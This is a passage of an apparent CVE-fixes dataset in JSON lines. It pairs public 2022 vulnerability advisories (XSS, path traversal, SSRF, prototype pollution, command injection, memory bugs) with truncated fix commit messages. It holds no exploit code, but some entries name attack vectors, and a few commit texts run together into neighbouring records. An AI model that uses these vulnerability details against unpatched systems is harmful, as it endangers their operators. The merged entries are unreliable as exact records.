"CVE-2022-24875", "source": "cvefixes", "timestamp": ""} {"id": "009996d50cb8b2144d18", "text": "CVE: CVE-2022-24876\n\n[{'lang': 'en', 'value': 'GLPI is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing. Kanban is a GLPI view to display Projects, Tickets, Changes or Problems on a task board. In versions prior to 10.0.1 a user can exploit a cross site scripting vulnerability in Kanban by injecting HTML code in its user name. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix comm", "cve_id": "CVE-2022-24876", "source": "cvefixes", "timestamp": ""} {"id": "51b0d1c8a11cb923f345", "text": "CVE: CVE-2022-24880\n\n[{'lang': 'en', 'value': 'flask-session-captcha is a package which allows users to extend Flask by adding an image based captcha stored in a server side session. In versions prior to 1.2.1, he `captcha.validate()` function would return `None` if passed no value (e.g. by submitting an having an empty form). If implementing users were checking the return value to be **False**, the captcha verification check could be bypassed. Version 1.2.1 fixes the issue. Users can workaround", "cve_id": "CVE-2022-24880", "source": "cvefixes", "timestamp": ""} {"id": "5698614d3806d33d8efc", "text": "CVE: CVE-2022-24881\n\n[{'lang': 'en', 'value': 'Ballcat Codegen provides the function of online editing code to generate templates. In versions prior to 1.0.0.beta.2, attackers can implement remote code execution through malicious code injection of the template engine. This happens because Velocity and freemarker templates are introduced but input verification is not done. The fault is rectified in version 1.0.0.beta.2.'}]\n\nFix commit: :lock: 修改模板引擎的默认安全策略,以防止RCE", "cve_id": "CVE-2022-24881", "source": "cvefixes", "timestamp": ""} {"id": "3a4b94ad8facb139db28", "text": "CVE: CVE-2022-24884\n\n[{'lang': 'en', 'value': 'ecdsautils is a tiny collection of programs used for ECDSA (keygen, sign, verify). `ecdsa_verify_[prepare_]legacy()` does not check whether the signature values `r` and `s` are non-zero. A signature consisting only of zeroes is always considered valid, making it trivial to forge signatures. Requiring multiple signatures from different public keys does not mitigate the issue: `ecdsa_verify_list_legacy()` will accept an arbitrary number of such forged", "cve_id": "CVE-2022-24884", "source": "cvefixes", "timestamp": ""} {"id": "0ceea414589178f60475", "text": "CVE: CVE-2022-24896\n\n[{'lang': 'en', 'value': 'Tuleap is a Free & Open Source Suite to manage software developments and collaboration. In versions prior to 13.7.99.239 Tuleap does not properly verify authorizations when displaying the content of tracker report renderer and chart widgets. Malicious users could use this vulnerability to retrieve the name of a tracker they cannot access as well as the name of the fields used in reports.'}]\n\nFix commit: request #26729 Tracker report renderer and cha", "cve_id": "CVE-2022-24896", "source": "cvefixes", "timestamp": ""} {"id": "5d548cfa1bb319f338f4", "text": "CVE: CVE-2022-24897\n\n[{'lang': 'en', 'value': 'APIs to evaluate content with Velocity is a package for APIs to evaluate content with Velocity. Starting with version 2.3 and prior to 12.6.7, 12.10.3, and 13.0, the velocity scripts are not properly sandboxed against using the Java File API to perform read or write operations on the filesystem. Writing an attacking script in Velocity requires the Script rights in XWiki so not all users can use it, and it also requires finding an XWiki API which ret", "cve_id": "CVE-2022-24897", "source": "cvefixes", "timestamp": ""} {"id": "c8968b61b70fa8e59bc1", "text": "CVE: CVE-2022-24898\n\n[{'lang': 'en', 'value': 'org.xwiki.commons:xwiki-commons-xml is a common module used by other XWiki top level projects. Starting in version 2.7 and prior to versions 12.10.10, 13.4.4, and 13.8-rc-1, it is possible for a script to access any file accessing to the user running XWiki application server with XML External Entity Injection through the XML script service. The problem has been patched in versions 12.10.10, 13.4.4, and 13.8-rc-1. There is no easy workaround for fixi", "cve_id": "CVE-2022-24898", "source": "cvefixes", "timestamp": ""} {"id": "23b29b31b470a2a1fe9f", "text": "CVE: CVE-2022-24899\n\n[{'lang': 'en', 'value': 'Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings.'}]\n\nFix commit: Merge pull request from GHSA-m8x6-6r63-qvj2", "cve_id": "CVE-2022-24899", "source": "cvefixes", "timestamp": ""} {"id": "51822378693c768f9a96", "text": "CVE: CVE-2022-24900\n\n[{'lang': 'en', 'value': 'Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. Version 1.3 and prior are vulnerable to a path traversal attack. The `os.path.join` call is unsafe for use with untrusted input. When the `os.path.join` call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Since the \"malicious\" parameter rep", "cve_id": "CVE-2022-24900", "source": "cvefixes", "timestamp": ""} {"id": "927eda45e2589aad91fa", "text": "CVE: CVE-2022-24903\n\n[{'lang': 'en', 'value': 'Rsyslog is a rocket-fast system for log processing. Modules for TCP syslog reception have a potential heap buffer overflow when octet-counted framing is used. This can result in a segfault or some other malfunction. As of our understanding, this vulnerability can not be used for remote code execution. But there may still be a slight chance for experts to do that. The bug occurs when the octet count is read. While there is a check for the maximum num", "cve_id": "CVE-2022-24903", "source": "cvefixes", "timestamp": ""} {"id": "87f640cefe1f49d0aab2", "text": "CVE: CVE-2022-24912\n\n[{'lang': 'en', 'value': 'The package github.com/runatlantis/atlantis/server/controllers/events before 0.19.7 are vulnerable to Timing Attack in the webhook event validator code, which does not use a constant-time comparison function to validate the webhook secret. It can allow an attacker to recover this secret as an attacker and then forge webhook events.'}]\n\nFix commit: fix: use constant time comparison of webhook secret in gitlab event validator (#2392)", "cve_id": "CVE-2022-24912", "source": "cvefixes", "timestamp": ""} {"id": "620d74a0067461de034f", "text": "CVE: CVE-2022-2493\n\n[{'lang': 'en', 'value': 'Data Access from Outside Expected Data Manager Component in GitHub repository openemr/openemr prior to 7.0.0.'}]\n\nFix commit: bug fixes b1 (#5280)", "cve_id": "CVE-2022-2493", "source": "cvefixes", "timestamp": ""} {"id": "c5310572d0c2bcab7164", "text": "CVE: CVE-2022-2494\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository openemr/openemr prior to 7.0.0.'}]\n\nFix commit: bug fix d (#5368)", "cve_id": "CVE-2022-2494", "source": "cvefixes", "timestamp": ""} {"id": "d37f9fd85554a449521a", "text": "CVE: CVE-2022-24949\n\n[{'lang': 'en', 'value': 'A privilege escalation to root exists in Eternal Terminal prior to version 6.2.0. This is due to the combination of a race condition, buffer overflow, and logic bug all in PipeSocketHandler::listen().'}]\n\nFix commit: red fixes (#468)\n\n* red fixes\r\n\r\n* remove magic number", "cve_id": "CVE-2022-24949", "source": "cvefixes", "timestamp": ""} {"id": "4fd4cad8d1509f99def6", "text": "CVE: CVE-2022-2495\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.2.21.'}]\n\nFix commit: update", "cve_id": "CVE-2022-2495", "source": "cvefixes", "timestamp": ""} {"id": "5c2422564a32fbb5c6bd", "text": "CVE: CVE-2022-24950\n\n[{'lang': 'en', 'value': \"A race condition exists in Eternal Terminal prior to version 6.2.0 that allows an authenticated attacker to hijack other users' SSH authorization socket, enabling the attacker to login to other systems as the targeted users. The bug is in UserTerminalRouter::getInfoForId().\"}]\n\nFix commit: red fixes (#468)\n\n* red fixes\r\n\r\n* remove magic number", "cve_id": "CVE-2022-24950", "source": "cvefixes", "timestamp": ""} {"id": "2932605f2c069711d73d", "text": "CVE: CVE-2022-24953\n\n[{'lang': 'en', 'value': 'The Crypt_GPG extension before 1.6.7 for PHP does not prevent additional options in GPG calls, which presents a risk for certain environments and GPG versions.'}]\n\nFix commit: Insert the end-of-options marker before operation arguments.\n\nThis marker stops the parsing of additional options during external\ncalls to GPG. This behavior is unintended but its security impact is\ndependent on the environment and the GPG version in use.", "cve_id": "CVE-2022-24953", "source": "cvefixes", "timestamp": ""} {"id": "fbfe0954a3eaa3d87242", "text": "CVE: CVE-2022-24958\n\n[{'lang': 'en', 'value': 'drivers/usb/gadget/legacy/inode.c in the Linux kernel through 5.16.8 mishandles dev->buf release.'}]\n\nFix commit: usb: gadget: clear related members when goto fail\n\ndev->config and dev->hs_config and dev->dev need to be cleaned if\ndev_config fails to avoid UAF.\n\nAcked-by: Alan Stern \nSigned-off-by: Hangyu Hua \nLink: https://lore.kernel.org/r/20211231172138.7993-3-hbh25y@gmail.com\nSigned-off-by: Greg Kroah", "cve_id": "CVE-2022-24958", "source": "cvefixes", "timestamp": ""} {"id": "220ab87f235095a1355b", "text": "CVE: CVE-2022-24958\n\n[{'lang': 'en', 'value': 'drivers/usb/gadget/legacy/inode.c in the Linux kernel through 5.16.8 mishandles dev->buf release.'}]\n\nFix commit: usb: gadget: don't release an existing dev->buf\n\ndev->buf does not need to be released if it already exists before\nexecuting dev_config.\n\nAcked-by: Alan Stern \nSigned-off-by: Hangyu Hua \nLink: https://lore.kernel.org/r/20211231172138.7993-2-hbh25y@gmail.com\nSigned-off-by: Greg Kroah-Hartman cmd != SIOCYAMSMCS.\n\nFixes: 0781168e23a2 (\"yam: fix a missing-check bug\")\nSigned-off-by: Hangyu Hua \nSigned-off-by: David S. Miller ", "cve_id": "CVE-2022-24959", "source": "cvefixes", "timestamp": ""} {"id": "d63286b2b6a0f756d558", "text": "CVE: CVE-2022-24976\n\n[{'lang': 'en', 'value': 'Atheme IRC Services before 7.2.12, when used in conjunction with InspIRCd, allows authentication bypass by ending an IRC handshake at a certain point during a challenge-response login sequence.'}]\n\nFix commit: saslserv/main: Track EID we're pending login to\n\nThe existing model does not remember that we've sent a SVSLOGIN for a\ngiven SASL session, and simply assumes that if a client is introduced\nwith a SASL session open, that session must have succe", "cve_id": "CVE-2022-24976", "source": "cvefixes", "timestamp": ""} {"id": "c1accea15ae4ca1c4ba9", "text": "CVE: CVE-2022-24977\n\n[{'lang': 'en', 'value': 'ImpressCMS before 1.4.2 allows unauthenticated remote code execution via ...../// directory traversal in origName or imageName, leading to unsafe interaction with the CKEditor processImage.php script. The payload may be placed in PHP_SESSION_UPLOAD_PROGRESS when the PHP installation supports upload_progress.'}]\n\nFix commit: Prevents using submitted filenames with ../ for controller (#812)\n\n* Prevents using submitted filenames with ../ for controller", "cve_id": "CVE-2022-24977", "source": "cvefixes", "timestamp": ""} {"id": "4ce03a82d16734045157", "text": "CVE: CVE-2022-25044\n\n[{'lang': 'en', 'value': 'Espruino 2v11.251 was discovered to contain a stack buffer overflow via src/jsvar.c in jsvNewFromString.'}]\n\nFix commit: Fix potential corruption issue caused by `delete [].__proto__` (fix #2142)", "cve_id": "CVE-2022-25044", "source": "cvefixes", "timestamp": ""} {"id": "7e1356d0a1e090a9f537", "text": "CVE: CVE-2022-25050\n\n[{'lang': 'en', 'value': 'rtl_433 21.12 was discovered to contain a stack overflow in the function somfy_iohc_decode(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.'}]\n\nFix commit: minor: Fix overflow in Clipsal-CMR113 and Somfy-IOHC reported by aug5t7", "cve_id": "CVE-2022-25050", "source": "cvefixes", "timestamp": ""} {"id": "0371b2e1dcb9f86d8557", "text": "CVE: CVE-2022-25051\n\n[{'lang': 'en', 'value': 'An Off-by-one Error occurs in cmr113_decode of rtl_433 21.12 when decoding a crafted file.'}]\n\nFix commit: minor: Fix overflow in Clipsal-CMR113 and Somfy-IOHC reported by aug5t7", "cve_id": "CVE-2022-25051", "source": "cvefixes", "timestamp": ""} {"id": "c542ebe29ed9dd7a80ca", "text": "CVE: CVE-2022-25139\n\n[{'lang': 'en', 'value': 'njs through 0.7.0, used in NGINX, was discovered to contain a heap use-after-free in njs_await_fulfilled.'}]\n\nFix commit: Fixed recursive async function calls.\n\nPreviously, PromiseCapability record was stored (function->context)\ndirectly in function object during a function invocation. This is\nnot correct, because PromiseCapability record should be linked to\ncurrent execution context. As a result, function->context is\noverwritten with consecutive ", "cve_id": "CVE-2022-25139", "source": "cvefixes", "timestamp": ""} {"id": "50cdf5012bc95c88b22c", "text": "CVE: CVE-2022-2514\n\n[{'lang': 'en', 'value': 'The time and filter parameters in Fava prior to v1.22 are vulnerable to reflected XSS due to the lack of escaping of error messages which contained the parameters in verbatim.'}]\n\nFix commit: avoid use of |safe filter in templates\n\nExplicitly mark those few places where we need to pass in data that\nshould not be escaped on the Python side.", "cve_id": "CVE-2022-2514", "source": "cvefixes", "timestamp": ""} {"id": "fd1933d517bbdcfcfe7d", "text": "CVE: CVE-2022-2522\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0061.'}]\n\nFix commit: patch 9.0.0061: ml_get error with nested autocommand\n\nProblem: ml_get error with nested autocommand.\nSolution: Also check line numbers for a nested autocommand. (closes #10761)", "cve_id": "CVE-2022-2522", "source": "cvefixes", "timestamp": ""} {"id": "9fb93cfac1fe8eca59f1", "text": "CVE: CVE-2022-2522\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0061.'}]\n\nFix commit: patch 9.0.0060: accessing uninitialized memory when completing long line\n\nProblem: Accessing uninitialized memory when completing long line.\nSolution: Terminate string with NUL.", "cve_id": "CVE-2022-2522", "source": "cvefixes", "timestamp": ""} {"id": "32e6dbd3aa55280b3166", "text": "CVE: CVE-2022-2523\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository beancount/fava prior to 1.22.2.'}]\n\nFix commit: fix xss issue in query filter", "cve_id": "CVE-2022-2523", "source": "cvefixes", "timestamp": ""} {"id": "eed36ac180862e48ce02", "text": "CVE: CVE-2022-25231\n\n[{'lang': 'en', 'value': 'The package node-opcua before 2.74.0 are vulnerable to Denial of Service (DoS) by sending a specifically crafted OPC UA message with a special OPC UA NodeID, when the requested memory allocation exceeds the v8’s memory limit.'}]\n\nFix commit: server: use ServiceFault on request error", "cve_id": "CVE-2022-25231", "source": "cvefixes", "timestamp": ""} {"id": "60414643cf9ac031d884", "text": "CVE: CVE-2022-25258\n\n[{'lang': 'en', 'value': 'An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur.'}]\n\nFix commit: USB: gadget: validate interface OS descriptor requests\n\nStall the control endpoint in case provided index exceeds array size of\nMAX_CONF", "cve_id": "CVE-2022-25258", "source": "cvefixes", "timestamp": ""} {"id": "a5087fbb65d05c191c0f", "text": "CVE: CVE-2022-25297\n\n[{'lang': 'en', 'value': 'This affects the package drogonframework/drogon before 1.7.5. The unsafe handling of file names during upload using HttpFile::save() method may enable attackers to write files to arbitrary locations outside the designated target folder.'}]\n\nFix commit: Prevent malformed upload path causing arbitrary write (#1174)", "cve_id": "CVE-2022-25297", "source": "cvefixes", "timestamp": ""} {"id": "10bc49b6d05df1e13ad6", "text": "CVE: CVE-2022-25298\n\n[{'lang': 'en', 'value': 'This affects the package sprinfall/webcc before 0.3.0. It is possible to traverse directories to fetch arbitrary files from the server.'}]\n\nFix commit: fix static file serving security issue; fix url path encoding issue", "cve_id": "CVE-2022-25298", "source": "cvefixes", "timestamp": ""} {"id": "f941e88231494a99e69d", "text": "CVE: CVE-2022-25299\n\n[{'lang': 'en', 'value': 'This affects the package cesanta/mongoose before 7.6. The unsafe handling of file names during upload using mg_http_upload() method may enable attackers to write files to arbitrary locations outside the designated target folder.'}]\n\nFix commit: Protect against the directory traversal in mg_upload()", "cve_id": "CVE-2022-25299", "source": "cvefixes", "timestamp": ""} {"id": "67d808edd1d8de427351", "text": "CVE: CVE-2022-25303\n\n[{'lang': 'en', 'value': 'The package whoogle-search before 0.7.2 are vulnerable to Cross-site Scripting (XSS) via the query string parameter q. In the case where it does not contain the http string, it is used to build the error_message that is then rendered in the error.html template, using the [flask.render_template](https://flask.palletsprojects.com/en/2.1.x/api/flask.render_template) function. However, the error_message is rendered using the [| safe filter](https://jinj", "cve_id": "CVE-2022-25303", "source": "cvefixes", "timestamp": ""} {"id": "c267401cc18ec58e0643", "text": "CVE: CVE-2022-25317\n\n[{'lang': 'en', 'value': 'An issue was discovered in Cerebrate through 1.4. genericForm allows reflected XSS in form descriptions via a user-controlled description.'}]\n\nFix commit: fix: [security] genericForm reflected XSS in form descriptions for user controlled descriptions\n\n- accessible via the MISP local tool setting change\n- sanitise the description\n\n- as reported by Dawid Czarnecki from Zigrin Security", "cve_id": "CVE-2022-25317", "source": "cvefixes", "timestamp": ""} {"id": "08f5dc1d54280ffacfa0", "text": "CVE: CVE-2022-25318\n\n[{'lang': 'en', 'value': 'An issue was discovered in Cerebrate through 1.4. An incorrect sharing group ACL allowed an unprivileged user to edit and modify sharing groups.'}]\n\nFix commit: fix: [security] Sharing group ACL fixes\n\n- added indirect object reference protection\n- added correct ACL functionalities to delete, addOrg, removeOrg\n\n- as reported by Dawid Czarnecki from Zigrin Security", "cve_id": "CVE-2022-25318", "source": "cvefixes", "timestamp": ""} {"id": "c2a431032c22e28bd244", "text": "CVE: CVE-2022-25319\n\n[{'lang': 'en', 'value': 'An issue was discovered in Cerebrate through 1.4. Endpoints could be open even when not enabled.'}]\n\nFix commit: fix: [security] open endpoints should only be open when enabled\n\n- as reported by Dawid Czarnecki from Zigrin Security", "cve_id": "CVE-2022-25319", "source": "cvefixes", "timestamp": ""} {"id": "6a11378a672ce3ecd7b7", "text": "CVE: CVE-2022-25320\n\n[{'lang': 'en', 'value': 'An issue was discovered in Cerebrate through 1.4. Username enumeration could occur.'}]\n\nFix commit: fix: [security] user settings allow enumeration of usernames\n\n- as reported by Dawid Czarnecki from Zigrin Security", "cve_id": "CVE-2022-25320", "source": "cvefixes", "timestamp": ""} {"id": "87ad0a478f40a825623d", "text": "CVE: CVE-2022-25321\n\n[{'lang': 'en', 'value': 'An issue was discovered in Cerebrate through 1.4. XSS could occur in the bookmarks component.'}]\n\nFix commit: fix: [settings:settingField] Enforce sanitization of input fields\n\n- As reported by Dawid Czarnecki from Zigrin Security", "cve_id": "CVE-2022-25321", "source": "cvefixes", "timestamp": ""} {"id": "3b7246129df01c01091d", "text": "CVE: CVE-2022-25321\n\n[{'lang': 'en', 'value': 'An issue was discovered in Cerebrate through 1.4. XSS could occur in the bookmarks component.'}]\n\nFix commit: fix: [userSettings] Perform URI validation for bookmarks\n\n- As reported by Dawid Czarnecki from Zigrin Security", "cve_id": "CVE-2022-25321", "source": "cvefixes", "timestamp": ""} {"id": "3119e9a1ea9bcdf301a7", "text": "CVE: CVE-2022-25352\n\n[{'lang': 'en', 'value': 'The package libnested before 1.5.2 are vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930)'}]\n\nFix commit: better fix for prototype pollution vulnerability\n\ncheers Idan Digmi of Snyk Security", "cve_id": "CVE-2022-25352", "source": "cvefixes", "timestamp": ""} {"id": "1a191ccc1874cb75cc68", "text": "CVE: CVE-2022-25354\n\n[{'lang': 'en', 'value': 'The package set-in before 2.0.3 are vulnerable to Prototype Pollution via the setIn method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049)'}]\n\nFix commit: better fix for prototype pollution vulnerability\n\ncheers Idan Digmi of Snyk Security", "cve_id": "CVE-2022-25354", "source": "cvefixes", "timestamp": ""} {"id": "c81dcc241b42013db52c", "text": "CVE: CVE-2022-25358\n\n[{'lang': 'en', 'value': 'A ..%2F path traversal vulnerability exists in the path handler of awful-salmonella-tar before 0.0.4. Attackers can only list directories (not read files). This occurs because the safe-path? Scheme predicate is not used for directories.'}]\n\nFix commit: Fix path traversal vulnerability\n\nThis change fixes a path traversal vulnerability that would allow\nattackers to navigate through the filesystem of the server (provided\nexecute access to directories f", "cve_id": "CVE-2022-25358", "source": "cvefixes", "timestamp": ""} {"id": "83ad5858d4415eb6d3aa", "text": "CVE: CVE-2022-25372\n\n[{'lang': 'en', 'value': 'Pritunl Client through 1.2.3019.52 on Windows allows local privilege escalation, related to an ACL entry for CREATOR OWNER in platform_windows.go.'}]\n\nFix commit: Update acl in service platform windows", "cve_id": "CVE-2022-25372", "source": "cvefixes", "timestamp": ""} {"id": "8e3313b578eef3a73361", "text": "CVE: CVE-2022-25375\n\n[{'lang': 'en', 'value': 'An issue was discovered in drivers/usb/gadget/function/rndis.c in the Linux kernel before 5.16.10. The RNDIS USB gadget lacks validation of the size of the RNDIS_MSG_SET command. Attackers can obtain sensitive information from kernel memory.'}]\n\nFix commit: usb: gadget: rndis: check size of RNDIS_MSG_SET command\n\nCheck the size of the RNDIS_MSG_SET command given to us before\nattempting to respond to an invalid message size.\n\nReported-by: Szymon Heid", "cve_id": "CVE-2022-25375", "source": "cvefixes", "timestamp": ""} {"id": "76b92a81c01deae84f4b", "text": "CVE: CVE-2022-2549\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository gpac/gpac prior to v2.1.0-DEV.'}]\n\nFix commit: fixed #2232", "cve_id": "CVE-2022-2549", "source": "cvefixes", "timestamp": ""} {"id": "9bb916212632ca43c780", "text": "CVE: CVE-2022-2550\n\n[{'lang': 'en', 'value': 'OS Command Injection in GitHub repository hestiacp/hestiacp prior to 1.6.5.'}]\n\nFix commit: fix DokuWiki shell issue\n\nUNTESTED as of writing; reported by https://huntr.dev/users/redstarp2/", "cve_id": "CVE-2022-2550", "source": "cvefixes", "timestamp": ""} {"id": "5b4fff542cf71ea9d46f", "text": "CVE: CVE-2022-2553\n\n[{'lang': 'en', 'value': 'The authfile directive in the booth config file is ignored, preventing use of authentication in communications from node to node. As a result, nodes that do not have the correct authentication key are not prevented from communicating with other nodes in the cluster.'}]\n\nFix commit: Revert \"Refactor: main: substitute is_auth_req macro\"\n\nThis reverts commit da79b8ba28ad4837a0fee13e5f8fb6f89fe0e24c.\n\nauthfile != authkey\n\nSigned-off-by: Jan Friesse form.", "cve_id": "CVE-2022-2580", "source": "cvefixes", "timestamp": ""} {"id": "f0bbc00f8b34dd8b4561", "text": "CVE: CVE-2022-2581\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.0104.'}]\n\nFix commit: patch 9.0.0105: illegal memory access when pattern starts with illegal byte\n\nProblem: Illegal memory access when pattern starts with illegal byte.\nSolution: Do not match a character with an illegal byte.", "cve_id": "CVE-2022-2581", "source": "cvefixes", "timestamp": ""} {"id": "c8891732879786fc9ef7", "text": "CVE: CVE-2022-25839\n\n[{'lang': 'en', 'value': 'The package url-js before 2.1.0 are vulnerable to Improper Input Validation due to improper parsing, which makes it is possible for the hostname to be spoofed. http://\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\localhost and http://localhost are the same URL. However, the hostname is not parsed as localhost, and the backslash is reflected as it is.'}]\n\nFix commit: Fix potential vulnerability for \"http://\\\\\\\\localhost\"", "cve_id": "CVE-2022-25839", "source": "cvefixes", "timestamp": ""} {"id": "a2a2c5a2b19bdc2c30f5", "text": "CVE: CVE-2022-25850\n\n[{'lang': 'en', 'value': 'The package github.com/hoppscotch/proxyscotch before 1.0.0 are vulnerable to Server-side Request Forgery (SSRF) when interceptor mode is set to proxy. It occurs when an HTTP request is made by a backend server to an untrusted URL submitted by a user. It leads to a leakage of sensitive information from the server.'}]\n\nFix commit: feat: ability to have a blacklist of target urls for proxy to make calls to", "cve_id": "CVE-2022-25850", "source": "cvefixes", "timestamp": ""} {"id": "5a380b35e3fe21fabd8f", "text": "CVE: CVE-2022-25851\n\n[{'lang': 'en', 'value': 'The package jpeg-js before 0.4.4 are vulnerable to Denial of Service (DoS) where a particular piece of input will cause to enter an infinite loop and never return.'}]\n\nFix commit: fix: validate sampling factors (#106)", "cve_id": "CVE-2022-25851", "source": "cvefixes", "timestamp": ""} {"id": "34072233ff4fee546d6c", "text": "CVE: CVE-2022-25854\n\n[{'lang': 'en', 'value': 'This affects the package @yaireo/tagify before 4.9.8. The package is used for rendering UI components inside the input or text fields, and an attacker can pass a malicious placeholder value to it to fire the XSS payload.'}]\n\nFix commit: fixes #989 - fix XSS", "cve_id": "CVE-2022-25854", "source": "cvefixes", "timestamp": ""} {"id": "4c1cb56bc0976b6c839f", "text": "CVE: CVE-2022-25858\n\n[{'lang': 'en', 'value': 'The package terser before 4.8.1, from 5.0.0 and before 5.14.2 are vulnerable to Regular Expression Denial of Service (ReDoS) due to insecure usage of regular expressions.'}]\n\nFix commit: fix potential regexp DDOS", "cve_id": "CVE-2022-25858", "source": "cvefixes", "timestamp": ""} {"id": "c002fd4467610355da52", "text": "CVE: CVE-2022-25865\n\n[{'lang': 'en', 'value': 'The package workspace-tools before 0.18.4 are vulnerable to Command Injection via git argument injection. When calling the fetchRemoteBranch(remote: string, remoteBranch: string, cwd: string) function, both the remote and remoteBranch parameters are passed to the git fetch subcommand in a way that additional flags can be set. The additional flags can be used to perform a command injection.'}]\n\nFix commit: Fix git fetch - addresses a potential securi", "cve_id": "CVE-2022-25865", "source": "cvefixes", "timestamp": ""} {"id": "df40d25a290c6df4baa8", "text": "CVE: CVE-2022-25866\n\n[{'lang': 'en', 'value': 'The package czproject/git-php before 4.0.3 are vulnerable to Command Injection via git argument injection. When calling the isRemoteUrlReadable($url, array $refs = NULL) function, both the url and refs parameters are passed to the git ls-remote subcommand in a way that additional flags can be set. The additional flags can be used to perform a command injection.'}]\n\nFix commit: Uses --end-of-options after command options (for security reasons)", "cve_id": "CVE-2022-25866", "source": "cvefixes", "timestamp": ""} {"id": "045fd480aa94eb0b67f9", "text": "CVE: CVE-2022-25867\n\n[{'lang': 'en', 'value': 'The package io.socket:socket.io-client before 2.0.1 are vulnerable to NULL Pointer Dereference when parsing a packet with with invalid payload format.'}]\n\nFix commit: fix: ensure the payload format is valid\n\nThis commit should prevent some NPE issues encountered after the\nparsing of the packet.\n\nRelated:\n\n- https://github.com/socketio/socket.io-client-java/issues/642\n- https://github.com/socketio/socket.io-client-java/issues/609\n- https://github.com", "cve_id": "CVE-2022-25867", "source": "cvefixes", "timestamp": ""} {"id": "27b23f5d207e3fb9725e", "text": "CVE: CVE-2022-25875\n\n[{'lang': 'en', 'value': 'The package svelte before 3.49.0 are vulnerable to Cross-site Scripting (XSS) due to improper input sanitization and to improper escape of attributes when using objects during SSR (Server-Side Rendering). Exploiting this vulnerability is possible via objects with a custom toString() function.'}]\n\nFix commit: [fix] harden attribute escaping during ssr (#7530)", "cve_id": "CVE-2022-25875", "source": "cvefixes", "timestamp": ""} {"id": "c4c63e5b6b0102656282", "text": "CVE: CVE-2022-25878\n\n[{'lang': 'en', 'value': 'The package protobufjs before 6.11.3 are vulnerable to Prototype Pollution which can allow an attacker to add/modify properties of the Object.prototype. This vulnerability can occur in multiple ways: 1. by providing untrusted user input to util.setProperty or to ReflectionObject.setParsedOption functions 2. by parsing/loading .proto files'}]\n\nFix commit: fix: do not let setProperty change the prototype (#1731)", "cve_id": "CVE-2022-25878", "source": "cvefixes", "timestamp": ""} {"id": "3efbcb8000c9552c576e", "text": "CVE: CVE-2022-2589\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository beancount/fava prior to 1.22.3.'}]\n\nFix commit: create tooltip contents in a xss-safe way", "cve_id": "CVE-2022-2589", "source": "cvefixes", "timestamp": ""} {"id": "6ea0fee47509f6f286ee", "text": "CVE: CVE-2022-25891\n\n[{'lang': 'en', 'value': 'The package github.com/containrrr/shoutrrr/pkg/util before 0.6.0 are vulnerable to Denial of Service (DoS) via the util.PartitionMessage function. Exploiting this vulnerability is possible by sending exactly 2000, 4000, or 6000 characters messages.'}]\n\nFix commit: fix(discord): message size fixes (#242)\n\n* fix(discord): handle empty messages without panic\r\n* fix: off by one error when partitioning messages\r\n* test(discord): add tests for Send failur", "cve_id": "CVE-2022-25891", "source": "cvefixes", "timestamp": ""} {"id": "4abe5c98fdb6c30b4d79", "text": "CVE: CVE-2022-25896\n\n[{'lang': 'en', 'value': 'This affects the package passport before 0.6.0. When a user logs in or logs out, the session is regenerated instead of being closed.'}]\n\nFix commit: Regenerate session on login.", "cve_id": "CVE-2022-25896", "source": "cvefixes", "timestamp": ""} {"id": "b1be894881b10f74f2d6", "text": "CVE: CVE-2022-25898\n\n[{'lang': 'en', 'value': 'The package jsrsasign before 10.5.25 are vulnerable to Improper Verification of Cryptographic Signature when JWS or JWT signature with non Base64URL encoding special characters or number escaped characters may be validated as valid by mistake. Workaround: Validate JWS or JWT signature if it has Base64URL and dot safe string before executing JWS.verify() or JWS.verifyJWT() method.'}]\n\nFix commit: CVE-2022-25898 Security fix in JWS and JWT validation", "cve_id": "CVE-2022-25898", "source": "cvefixes", "timestamp": ""} {"id": "dfd8009c4106b6d494ec", "text": "CVE: CVE-2022-25907\n\n[{'lang': 'en', 'value': 'The package ts-deepmerge before 2.0.2 are vulnerable to Prototype Pollution due to missing sanitization of the merge function.'}]\n\nFix commit: prevent against prototype pollution", "cve_id": "CVE-2022-25907", "source": "cvefixes", "timestamp": ""} {"id": "8029dfe92fc16ec71d74", "text": "CVE: CVE-2022-2595\n\n[{'lang': 'en', 'value': 'Improper Authorization in GitHub repository kromitgmbh/titra prior to 0.79.1.'}]\n\nFix commit: 🐛 fixed a bug in the oidc configuration preventing saving changes\n🔒 fixed admin authorization validation for all administration pages\n🔒 fixed a stored XSS vulnerability in the task functionality", "cve_id": "CVE-2022-2595", "source": "cvefixes", "timestamp": ""} {"id": "9890d854f0a880db142a", "text": "CVE: CVE-2022-2596\n\n[{'lang': 'en', 'value': 'Denial of Service in GitHub repository node-fetch/node-fetch prior to 3.2.10.'}]\n\nFix commit: fix: ReDoS referrer (#1611)\n\n* fix ReDoS referrer\r\n\r\n* Update src/utils/referrer.js\r\n\r\nEliminate regex and use string matcher\r\n\r\nCo-authored-by: Linus Unnebäck \r\n\r\nCo-authored-by: Khang. Võ Vĩ 